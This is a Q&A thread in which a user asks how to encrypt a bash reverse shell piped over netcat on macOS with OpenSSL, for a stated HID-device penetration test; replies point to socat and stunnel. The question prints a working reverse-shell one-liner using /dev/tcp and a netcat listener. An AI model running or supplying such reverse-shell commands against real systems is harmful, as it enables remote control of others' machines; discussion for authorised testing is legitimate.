# Encrypting Netcat data with OpenSSL

Tags: macos, bash, encryption, openssl, netcat

So I have a basic communication stream that managed by netcat. A user can create a bash shell and forward control to localhost at port 5555, for example. How could you pipe this through OpenSSL to achieve a connection that is symmetrically encrypted? I am only able to work with tools that come installed on an OSX machine.

*Create Shell*

```
bash -i >& /dev/tcp/localhost/5555 0>&1
```

*Catch Shell*

```
nc -l -p 5555
```

*Encrypt data with OpenSSL*

```
openssl aes-256-cbc -salt -a -e -in plaintext.txt -out encrypted.txt
```

*Decrypt data with OpenSSL*

```
openssl aes-256-cbc -salt -a -d -in encrypted.txt -out plaintext.txt
```

**Kind of what I'm looking for**

```
bash -i & | openssl -e > /dev/tcp/localhost/5555 0>&1
nc -l -p 5555 | openssl -d
```

Comment: What about using socat, doesn't it count as well? Stunnel? openssl itself has "connect", "s_server" and "s_client" options, and one can to put data on its STDIN. http://en.wikipedia.org/wiki/Netcat#Variants http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html

Comment: Hmm all of those options would be perfect. Unfortunately, I am only able to use tools that come installed on an OSX machine.

Answer (score 1):

Based on additional information from your comment, install MacPorts, and try to use ported socat or stunnel.

```
dtpwmbp:~ pwadas$ uname -a ; sudo port list |egrep -i socat\|stunnel
Darwin dtpwmbp 12.4.0 Darwin Kernel Version 12.4.0: Wed May  1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
stunnel                        @4.47           security/stunnel
socat                          @1.7.2.1        sysutils/socat
dtpwmbp:~ pwadas$
```

http://www.macports.org

Comment: Off topic, but you really should take some fantasy training. The `dtpwmbp` - is probably (DT)? (P)iotr (W)adas (M)ac(B)ook(Pro) - but sorry, it is horrible name for an MAC computer... ;) :) :)

Comment: lol, I have only one mac for private use, and I don't plan to have more. I also call my cat "cat", and motorbikes have their own names you know ;-) DT is a nickname :) http://cv.dtpw.pl . Said jm666. Could be at least jm686 :P

Comment: This would involve 'installing' something. Sorry I'm a pain in the a** lol. This is for a penetration test via an HID device where the user will not have permission to install anything.

Comment: if it's for penetration test, why do you care about encryption? Real attacker would not. And, theoretically, you can still have an option to "install" shell-based something without escalating permission, or copy it in precompiled from elsewhere if you were able to get shell access.

Comment: Question perhaps should be moved to superuser.com , security.stackexchange.com or apple.stackexchange.com